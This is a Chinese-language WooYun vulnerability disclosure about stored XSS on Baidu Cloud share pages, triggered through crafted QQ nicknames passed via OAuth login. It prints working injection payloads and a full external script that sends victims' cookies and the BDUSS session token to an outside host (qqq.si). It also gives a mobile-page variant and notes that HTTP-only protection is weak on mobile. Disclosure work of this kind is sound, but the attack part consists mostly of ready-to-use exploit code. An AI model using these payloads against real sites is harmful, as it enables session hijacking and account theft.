WooYun.org

先来看 http://pan.baidu.com/s/xxxxxxx 这样一个百度云下载页中的一段JS代码(格式化后)：

这里的 disk.util.ViewShareUtils.linkUserName 是分享者的ID。问题就出在这儿，使用QQ登录百度云(http://yun.baidu.com)，QQ昵称中带有的特殊符号(如双引号，分号，括号等)没有被过滤，OAuth接口带来了安全隐患。
注册一个新的QQ，将昵称改为

"});alert(1)//

,登录百度云后上传一个文件，分享。http://pan.baidu.com/s/1bnb9GTL 弹咯

加载外部JS: 注册一个新的QQ，把QQ昵称改为

"});$.getScript("//qqq.si/w0vcEd")//

(QQ空间可以改超长昵称哦)同样分享一个文件，得到链接 http://pan.baidu.com/s/1c0kvees

JS内容:

(function(){(new Image()).src='http://qqq.si/?id=g2L5Jq&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return FileUtils.cktoken}catch(e){return ''}})());})();

啊，顺便说一下，百度云的下载页中的 FileUtils.cktoken 存储了BDUSS哦

所以，只要有人打开 http://pan.baidu.com/s/1c0kvees ，他的BDUSS就到我的手里咯。

即使没有登录，也会加载这个JS，可以做一些邪恶的事 ._.
以上是WEB版的百度云下载页。同样的，手机版的页面也存在类似的XSS，虽然手机版的页面中没有输出BDUSS，但大部分手机浏览器是不支持http-only的，也就是说，http-only这个防护对移动端是形同虚设！
节选一小段UA伪装为手机后访问百度云下载页返回的JS代码，格式化后:

很容易就构造出语句

"};alert(1)//

注册一个新的QQ，昵称修改为这个，分享一个文件，手机用户打开该链接 http://pan.baidu.com/s/1c0fBzNi 就会执行JS代码了

至于加载外部JS窃取BDUSS，虽然wap版的下载页面没有$.getScript(), 但神奇的JS一定会有更多的方法，这里不再深入研究了( 暑假作业还没写噜